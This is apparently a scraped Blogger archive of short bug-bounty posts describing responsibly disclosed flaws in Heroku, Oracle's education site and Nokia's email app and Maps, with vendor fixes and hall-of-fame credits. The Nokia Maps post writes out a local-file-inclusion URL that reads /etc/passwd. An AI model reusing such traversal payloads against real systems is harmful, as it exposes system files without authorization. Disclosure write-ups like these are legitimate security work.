<br style="text-align: left;" />
<span style="text-align: left;">Anyways they were happy, and even I am :)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-TNZNMyLShJc/Up9tSh6mNdI/AAAAAAAABeo/BwB3Osu8_X4/s1600/CTF.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://4.bp.blogspot.com/-TNZNMyLShJc/Up9tSh6mNdI/AAAAAAAABeo/BwB3Osu8_X4/s320/CTF.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div style="text-align: left;">
Cheers :)</div>
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com1tag:blogger.com,1999:blog-499911195830393683.post-38914617595183937972013-12-03T21:13:00.000+05:302019-08-17T15:40:20.658+05:30Heroku Directory Transversal<div dir="ltr" style="text-align: left;" trbidi="on">
Long back I spotted a Directory Traversal bug in Heroku.<br />
<br />
"Heroku is a cloud platform is a cloud application platform – a new way of building and deploying web apps. Heroku was acquired by Salesforce.com in 2010."<br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-bDDhv_sqq9E/Up356umx3GI/AAAAAAAABd4/DbD5L5G_784/s1600/herokuLFI.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://1.bp.blogspot.com/-bDDhv_sqq9E/Up356umx3GI/AAAAAAAABd4/DbD5L5G_784/s400/herokuLFI.PNG" width="400" /></a></div>
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> They were quite quick and fixed it without delays<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fJETqX32ou0/Up36zmrdGhI/AAAAAAAABeA/DUx4hWDlMx4/s1600/reply.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-fJETqX32ou0/Up36zmrdGhI/AAAAAAAABeA/DUx4hWDlMx4/s400/reply.PNG" width="400" /></a></div>
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> Later they even started their hall of fame page and included my name there :)<span style="background-color: white;"><span style="color: #222222; font-family: "arial" , sans-serif; font-size: x-small;"><span style="line-height: 16px;"><br /></span></span></span><a href="https://www.heroku.com/policy/security-hall-of-fame">https://www.heroku.com/policy/security-hall-of-fame</a><br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> <span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2VY3RzpPr5M/Up37jieF7xI/AAAAAAAABeM/h63VRh62AgY/s1600/hof.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://1.bp.blogspot.com/-2VY3RzpPr5M/Up37jieF7xI/AAAAAAAABeM/h63VRh62AgY/s400/hof.PNG" width="400" /></a></div>
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-26051312092328832862013-11-17T14:08:00.002+05:302019-08-17T15:41:35.363+05:30Oracle xss<div dir="ltr" style="text-align: left;" trbidi="on">
Every one knows about ORACLE. Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.<br />
<div>
<br /></div>
<div>
I spotted some security issues on their website, and finally, they have fixed it. One of them was cross-site scripting issue in oracle's sub-domain <a href="http://education.oracle.com/">http://education.oracle.com</a> </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kKjzPZNyrs0/Uoh-VnNbU4I/AAAAAAAABdE/QeStUUlmimU/s1600/oracalxss2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://1.bp.blogspot.com/-kKjzPZNyrs0/Uoh-VnNbU4I/AAAAAAAABdE/QeStUUlmimU/s400/oracalxss2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
they took a long time in fixing but after the fix, they acknowledged me on their website.</div>
<div>
<br /></div>
<div>
Oracle Critical Patch Update Advisory - January 2013 - Beta Oracle CVRF</div>
<div>
<a href="http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841213.xml">http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841213.xml</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-vYEHh6fKK0M/Uoh_srPr6nI/AAAAAAAABdQ/flh3k-b-ZZI/s1600/oraclehof.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://3.bp.blogspot.com/-vYEHh6fKK0M/Uoh_srPr6nI/AAAAAAAABdQ/flh3k-b-ZZI/s400/oraclehof.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br />
And </div>
<div>
Oracle Critical Patch Update Advisory - July 2013 - Beta Oracle CVRF</div>
<div>
<a href="http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841215.xml">http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841215.xml</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aEiaXAQYCtM/UoiAPksDu9I/AAAAAAAABdY/ta3ZH_JZxFQ/s1600/oraclehof2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://2.bp.blogspot.com/-aEiaXAQYCtM/UoiAPksDu9I/AAAAAAAABdY/ta3ZH_JZxFQ/s320/oraclehof2.PNG" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
cheers :)<br />
<br /></div>
</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-359136340672700252013-10-22T18:27:00.001+05:302019-08-17T15:42:43.315+05:30Nokia email app pwnage <div dir="ltr" style="text-align: left;" trbidi="on">
This was an interesting bug which I found in the Nokia email app for Symbian mobiles in MARCH 2013.<br />
The email app was not filtering the JavaScripts in the body part of the mail and thereby leading to JavaScript execution via mail.<br />
<br />
<b><br /></b><b>THE VERSION OF NOKIA MAIL: 10.2.0.29(main)</b><b><br /></b><b>NOKIA 5233 FIRMWARE COMPLETE DETAILS<br />software version: v51.1.002<br />software version date: 19-10-2011<br />custom version : 51.1.002.C01.01<br />custom version date: 19-10-2011<br />language set: 21<br />Model: 5233<br />type: Rm-625</b><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yN9jfi7i-oI/UmZyakC8RpI/AAAAAAAABak/ogdiSCK8_74/s1600/Screen2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-yN9jfi7i-oI/UmZyakC8RpI/AAAAAAAABak/ogdiSCK8_74/s400/Screen2.jpg" width="225" /></a></div>
<br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
<br />
<br />
<br />
<br />
This bug took a long time in fixing but finally when they did ;-) I got a mail from Nokia<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pYtgGEy-ohs/UmZ0U69unlI/AAAAAAAABas/oNVtj3DmmVQ/s1600/emal.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://2.bp.blogspot.com/-pYtgGEy-ohs/UmZ0U69unlI/AAAAAAAABas/oNVtj3DmmVQ/s320/emal.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
TRIBUTE TO MY OLD PAL "NOKIA 5233" who passed away recently breaking its screen, sound system, and everything after slipping off from my hand.</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-70271404207545953382013-10-22T17:37:00.001+05:302019-08-17T15:43:18.594+05:30LFI in Nokia maps <div dir="ltr" style="text-align: left;" trbidi="on">
Well, this is my first blog-post, and I am going to share a Local File inclusion bug which I spotted in Nokia maps.<br />
<br />
<b>http://maps.nokia.com/services/file:///etc/passwd</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-piQCcrucQTE/UmaaBQe-xGI/AAAAAAAABa8/YRe_vS1Erwg/s1600/nokiaLFI.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="236" src="https://3.bp.blogspot.com/-piQCcrucQTE/UmaaBQe-xGI/AAAAAAAABa8/YRe_vS1Erwg/s400/nokiaLFI.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
reported on 2nd JAN 2013<br />
Nokia fixes it on 20th JAN 2013<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-GcKVX3g1BvA/UmZpEo62t_I/AAAAAAAABaU/IJQr-UoZ1sw/s1600/nokia.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://4.bp.blogspot.com/-GcKVX3g1BvA/UmZpEo62t_I/AAAAAAAABaU/IJQr-UoZ1sw/s400/nokia.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And I received an awesome RED NOKIA LUMIA 920 :)<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0